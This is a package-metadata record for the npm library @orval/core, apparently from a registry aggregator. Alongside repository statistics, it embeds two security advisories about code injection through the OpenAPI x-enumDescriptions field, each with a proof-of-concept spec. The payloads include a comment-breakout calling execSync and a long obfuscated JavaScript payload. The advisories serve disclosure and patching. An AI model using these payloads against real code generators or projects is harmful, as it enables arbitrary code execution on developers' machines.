{"id":5436011,"name":"@orval/core","ecosystem":"npm","description":null,"homepage":"https://orval.dev","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/orval-labs/orval","keywords_array":[],"namespace":"orval","versions_count":110,"first_release_published_at":"2022-11-16T15:13:07.403Z","latest_release_published_at":"2026-04-15T13:43:05.486Z","latest_release_number":"8.8.0","last_synced_at":"2026-04-16T16:12:49.912Z","created_at":"2022-11-18T00:11:11.079Z","updated_at":"2026-04-17T01:12:01.764Z","registry_url":"https://www.npmjs.com/package/@orval/core","install_command":"npm install @orval/core","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"alpha":"6.14.1","next":"7.0.1","rc":"8.0.0-rc.6","latest":"8.8.0"}},"repo_metadata":{"id":36980981,"uuid":"238402553","full_name":"orval-labs/orval","owner":"orval-labs","description":"orval is able to generate client with appropriate type-signatures (TypeScript) from any valid OpenAPI v3 or Swagger v2 specification, either in yaml or json formats. 
🍺","archived":false,"fork":false,"pushed_at":"2026-04-09T14:18:25.000Z","size":24379,"stargazers_count":5655,"open_issues_count":167,"forks_count":580,"subscribers_count":13,"default_branch":"master","last_synced_at":"2026-04-09T15:06:53.827Z","etag":null,"topics":["angular","axios-client","codegen","faker","mock","msw","openapi-specification","orval","react","react-query","swagger","typescript"],"latest_commit_sha":null,"homepage":"https://orval.dev","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/orval-labs.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["anymaniax","melloware","soartec-lab"]}},"created_at":"2020-02-05T08:31:50.000Z","updated_at":"2026-04-09T14:20:12.000Z","dependencies_parsed_at":"2026-01-08T21:04:56.230Z","dependency_job_id":null,"html_url":"https://github.com/orval-labs/orval","commit_stats":{"total_commits":1518,"total_committers":171,"mean_commits":8.87719298245614,"dds":0.422266139657444,"last_synced_commit":"47afdfaa77bd4ebf412614cd1f01965d849ec758"},"previous_names":["orval-labs/orval"],"tags_count":240,"template":false,"template_full_name":null,"purl":"pkg:github/orval-labs/orval","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval/tags","releases_url":"https://repos.ecosyste.ms/api/v1/host
s/GitHub/repositories/orval-labs%2Forval/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/orval-labs","download_url":"https://codeload.github.com/orval-labs/orval/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31846691,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-15T13:28:40.153Z","status":"ssl_error","status_checked_at":"2026-04-15T13:28:29.396Z","response_time":63,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-04-16T16:13:09.965Z","dependent_packages_count":9,"downloads":5141042,"downloads_period":"last-month","dependent_repos_count":97,"rankings":{"downloads":0.4985567639776568,"dependent_repos_count":1.4926891509759292,"dependent_packages_count":2.421390119783199,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":1.470878678245595},"purl":"pkg:npm/%40orval/core","advisories":[{"uuid":"GSA_kwCzR0hTQS1nY2gyLXBocWgtZmc5cc4ABRvn","url":"https://github.com/advisories/GHSA-gch2-phqh-fg9q","title":"Orval has Code Injection via unsanitized x-enum-descriptions using JS 
comments","description":"[CVE-2026-23947](https://github.com/advisories/GHSA-h526-wf6g-67jv) had an incomplete fix\n\nWhile the current [jsStringEscape](https://github.com/orval-labs/orval/blob/02211fc413524be340ba9ace866a2ef68845ca7c/packages/core/src/utils/string.ts#L227) function properly handles single quotes ('), double quotes (\") and other characters, it fails to sanitize * and / characters. This allows attackers to break out of JavaScript comment blocks using */ sequences and inject arbitrary code into generated files.\n\n**Example:**\n\n```yaml\nopenapi: 3.0.4\ninfo:\n  title: Enum PoC\n  version: \"1.0.0\"\n\npaths:\n  /ping:\n    get:\n      operationId: ping\n      responses:\n        \"200\":\n          description: ok\n          content:\n            application/json:\n              schema:\n                $ref: \"#/components/schemas/EvilEnum\"\n\ncomponents:\n  schemas:\n    EvilEnum:\n      type: string\n      enum:\n        - PWNED\n      x-enumDescriptions:\n        # \"pwned */ }; import('child_process').then(cp =\u003e cp.execSync('touch pwned')); const a = { /*\"\n        - \"pwned */ }; 
[][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]
+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+(([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]
+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![
]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(
[][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])()); const a = { /*\"\n\n```","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-01-30T21:17:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/orval-labs/orval/security/advisories/GHSA-gch2-phqh-fg9q","https://github.com/orval-labs/orval/blob/02211fc413524be340ba9ace866a2ef68845ca7c/packages/core/src/utils/string.ts#L227","https://github.com/orval-labs/orval/releases/tag/v7.21.0","https://github.com/orval-labs/orval/releases/tag/v8.2.0","https://github.com/orval-labs/orval/security/advisories/GHSA-h526-wf6g-67jv","https://nvd.nist.gov/vuln/detail/CVE-2026-25141","https://github.com/advisories/GHSA-gch2-phqh-fg9q"],"source_kind":"github","identifiers":["GHSA-gch2-phqh-fg9q","CVE-2026-25141"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-30T22:00:07.881Z","updated_at":"2026-04-17T01:01:38.839Z","epss_percentage":0.00029,"epss_percentile":0.08348,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nY2gyLXBocWgtZmc5cc4ABRvn","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nY2
gyLXBocWgtZmc5cc4ABRvn","packages":[{"ecosystem":"npm","package_name":"@orval/core","versions":[{"first_patched_version":"8.2.0","vulnerable_version_range":"\u003e= 8.0.0, \u003c 8.2.0"},{"first_patched_version":"7.21.0","vulnerable_version_range":"\u003e= 7.19.0, \u003c 7.21.0"}],"purl":"pkg:npm/%40orval%2Fcore"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nY2gyLXBocWgtZmc5cc4ABRvn/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oNTI2LXdmNmctNjdqds4ABRUQ","url":"https://github.com/advisories/GHSA-h526-wf6g-67jv","title":"Orval has a code injection via unsanitized x-enum-descriptions in enum generation","description":"### Impact\nArbitrary code execution in environments consuming generated clients\n\nThis issue is similar in nature to the recently-patched MCP vulnerability (CVE-2026-22785), but affects a different code path in @orval/core that was not addressed by that fix.\n\nThe vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript code into generated clients via the x-enumDescriptions field, which is embedded without proper escaping in getEnumImplementation(). 
I have confirmed that the injection occurs during const enum generation and results in executable code within the generated schema files.\n\n### Patches\nUpgrade to Orval 8.0.2 (8.x line) or 7.19.0 (7.x line). Note: this fix was later reported as incomplete in GHSA-gch2-phqh-fg9q (CVE-2026-25141), which lists 8.2.0 and 7.21.0 as the first patched versions.\n\n### References\nAn example OpenAPI showing the issue:\n\n```yaml\nopenapi: 3.0.4\ninfo:\n  title: Enum PoC\n  version: \"1.0.0\"\n\npaths:\n  /ping:\n    get:\n      operationId: ping\n      responses:\n        \"200\":\n          description: ok\n          content:\n            application/json:\n              schema:\n                $ref: \"#/components/schemas/EvilEnum\"\n\ncomponents:\n  schemas:\n    EvilEnum:\n      type: string\n      enum:\n        - PWNED\n      x-enumDescriptions:\n        - \"pwned */ require('child_process').execSync('id'); /*\"\n```","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-01-21T01:01:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/orval-labs/orval/security/advisories/GHSA-h526-wf6g-67jv","https://nvd.nist.gov/vuln/detail/CVE-2026-23947","https://github.com/orval-labs/orval/commit/9e5d93533904936678ba93b5d20f6bca176a4e1e","https://github.com/orval-labs/orval/releases/tag/v8.0.2","https://github.com/orval-labs/orval/releases/tag/v7.19.0","https://github.com/advisories/GHSA-h526-wf6g-67jv"],"source_kind":"github","identifiers":["GHSA-h526-wf6g-67jv","CVE-2026-23947"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-21T02:00:07.955Z","updated_at":"2026-04-17T01:01:43.184Z","epss_percentage":0.00043,"epss_percentile":0.13079,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNTI2LXdmNmctNjdqds4ABRUQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oNTI2LXdmNmctNjdqds4ABRUQ","packages":[{"ecosystem":"npm","package_name":"@orval/core","versions":[{"first_patched_version":"7.19.0","vulnerable_version_range":"\u003c 
7.19.0"},{"first_patched_version":"8.0.2","vulnerable_version_range":"\u003e= 8.0.0-rc.0, \u003c 8.0.2"}],"purl":"pkg:npm/%40orval%2Fcore"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNTI2LXdmNmctNjdqds4ABRUQ/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@orval/core","docker_dependents_count":1,"docker_downloads_count":18,"usage_url":"https://repos.ecosyste.ms/usage/npm/@orval/core","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@orval/core/dependencies","status":null,"funding_links":["https://github.com/sponsors/anymaniax","https://github.com/sponsors/melloware","https://github.com/sponsors/soartec-lab"],"critical":null,"issue_metadata":{"last_synced_at":"2026-04-15T12:01:36.404Z","issues_count":432,"pull_requests_count":831,"avg_time_to_close_issue":11906746.317647059,"avg_time_to_close_pull_request":584914.866847826,"issues_closed_count":255,"pull_requests_closed_count":736,"pull_request_authors_count":141,"issue_authors_count":307,"avg_comments_per_issue":2.0625,"avg_comments_per_pull_request":1.0974729241877257,"merged_pull_requests_count":607,"bot_issues_count":1,"bot_pull_requests_count":204,"past_year_issues_count":140,"past_year_pull_requests_count":237,"past_year_avg_time_to_close_issue":595229.65,"past_year_avg_time_to_close_pull_request":232670.96648044692,"past_year_issues_closed_count":60,"past_year_pull_requests_closed_count":179,"past_year_pull_request_authors_count":65,"past_year_issue_authors_count":105,"past_year_avg_comments_per_issue":1.0785714285714285,"past_year_avg_comments_per_pull_request":1.0886075949367089,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":36,"past_year_merged_pull_requests_count":149,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval/issues","maintainers":[{"login":"soartec-lab","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/Gi
tHub/authors/soartec-lab"},{"login":"anymaniax","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anymaniax"},{"login":"melloware","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/melloware"}],"active_maintainers":[{"login":"soartec-lab","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/soartec-lab"},{"login":"melloware","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/melloware"},{"login":"anymaniax","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anymaniax"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fcore/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fcore/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fcore/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fcore/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fcore/codemeta","maintainers":[{"uuid":"melloware","login":"melloware","name":null,"email":"mellowaredev@gmail.com","url":null,"packages_count":21,"html_url":"https://www.npmjs.com/~melloware","role":null,"created_at":"2025-08-25T15:17:18.263Z","updated_at":"2025-08-25T15:17:18.263Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/melloware/packages"},{"uuid":"anymaniax","login":"anymaniax","name":null,"email":"anymaniax@icloud.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~anymaniax","role":null,"created_at":"2022-11-18T00:30:30.238Z","updated_at":"2022-11-18T00:30:30.238Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org